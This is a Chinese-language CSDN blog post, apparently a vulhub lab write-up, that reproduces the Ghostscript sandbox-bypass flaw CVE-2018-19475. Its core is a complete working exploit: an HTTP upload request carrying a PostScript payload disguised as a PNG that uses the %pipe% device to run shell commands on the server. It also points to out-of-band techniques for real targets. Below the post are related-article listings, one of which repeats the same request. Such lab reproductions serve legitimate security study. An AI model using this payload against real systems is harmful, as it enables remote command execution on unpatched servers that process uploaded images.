GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-19475 漏洞复现

最新推荐文章于 2024-03-07 14:19:55 发布
最新推荐文章于 2024-03-07 14:19:55 发布
阅读量505 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114041073
版权

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)

by ADummy

0x00利用路线

​ 构造poc png图片—>上传图片—>有回显命令执行

0x01漏洞介绍

​ 2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。

0x02漏洞复现

将POC作为图片上传,执行命令id > /tmp/success && cat /tmp/success

POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

在这里插入图片描述

当然,真实环境下通常无法直接回显漏洞执行结果,你需要使用带外攻击的方式来检测漏洞

当然,真实环境下通常无法直接回显漏洞执行结果,你需要使用带外攻击的方式来检测漏洞

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475
qq_51577576的博客
12-17 703
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475 CVE-2018-19475CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令
ghostscript-9.26-bin
10-12
标题中的"ghostscript-9.26-bin"指的是Ghostscript的9.26版本的二进制发行版,这个版本包含了可执行文件和其他必要的动态链接库(.so文件),使得用户能够在不同的平台上运行和处理PostScript和PDF文件。 ...
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475复现
HEAVEN569的博客
06-28 441
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475复现
buuctf [GhostScript]CVE-2018-19475
qq_1873822的博客
03-30 431
漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 ./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475
EC_Carrot的博客
06-06 544
漏洞背景 Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器。该产品可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Software Ghostscript 9.26之前版本中的psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施
Buuctf [GhostScript]CVE-2018-19475
ch258563的博客
05-30 157
Buuctf [GhostScript]CVE-2018-19475
ghostscript-9.02.tar.gz
09-03
ghostscript-9.02,用于linux中pdf转图片工具
Node.js-使用Ghostscript命令优化PDF文件大小
08-10
最后,我们调用`gs.run`执行Ghostscript命令,并确保在完成后调用`gs.shutdown`关闭Ghostscript进程。 在实际项目中,你可能需要根据具体需求调整优化参数。例如,如果你的PDF包含大量高分辨率的图像,你可能需要...
exportfig-ghostscript-xpdftools.rar
06-05
export_fig可以使matlab更方便的输出图像,如去除白边,保真等,此包提供配置export_fig所需的软件。我写的配套的教程如下:https://blog.csdn.net/Liangontheway/article/details/90903348
使用Ghostscript命令优化PDF-Node.js开发
05-27
gsx-pdf-optimize使用Ghostscript gsx命令优化PDF,例如test / raw_pdf.pdf(由Figma生成)从3.7 MB扩展到642 KB。 安装首先,请确保已在命令中安装了Ghostscript。 在gsx-pdf-optimize使用Ghostscript gsx命令优化...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
全面认识Flex安全沙箱
11-17
全面认识Flex安全沙箱 flex4发布后在IE中运行出现的安全沙箱问题。
复现vulhub中ghostscriptCVE-2018-19475漏洞
最新发布
YX_zjp的博客
03-07 757
2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。5、上传poc.png,点击“提交查询”,执行命令id > /tmp/success && cat /tmp/success。GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475)系统:ubuntu20.04。
php沙盒绕过,GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475
weixin_30317869的博客
03-21 223
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
cve-2018-1000006复现
Yale的博客
04-02 665
编译受漏洞影响的版本 启动web服务 下载压缩包 解压后执行vul-app.exe 这时候会在本地注册表注册 然后点击poc就可以谈计算器了 具体的分析请查阅巴斯光年实验室的分析 ...
vulhub漏洞复现十七_GhostScript
weixin_44193247的博客
01-28 923
vulhub漏洞复现练习篇
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
ADummy的博客
03-03 324
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 374
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值